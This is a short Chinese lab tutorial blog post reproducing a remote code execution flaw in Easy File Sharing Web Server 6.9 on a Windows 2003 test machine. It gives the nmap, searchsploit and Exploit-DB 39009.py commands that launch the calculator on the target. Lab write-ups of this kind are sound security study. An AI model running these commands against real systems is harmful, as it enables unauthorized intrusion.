Easy File Sharing Web Server漏洞复现

一、复现目的

1、利用Nmap扫描发现靶机(Windows)运行了该服务。
2、利用该漏洞,使得靶机运行计算器。

二、复现环境

1、win2003靶机

2、kali虚拟机

三、复现过程

1、在靶机(Win2003)中安装easy file sharing server,端口改为80,URL为靶机ip

61607a46d0474483b35b61a6209ce608.png

2、在kali中用nmap -sV扫描靶机IP

47e32ee7bb4d4cb7992b3466b44167cc.png

可以看到靶机中运行了Easy File Sharing Web Server httpd 6.9服务

3、使用searchsploit easy file sharing 检测EasyFileSharing存在的漏洞

611664a071744bd991eac97dc04ab1b5.png

4、在kali中执行python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.228.57 80

0edd2103adc24a109a1a2a2719802244.png

打开靶机即可看到计算器被调用了。

f3bb99bc622441d5a5c56b73beccd801.png

 

 

 

 

  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值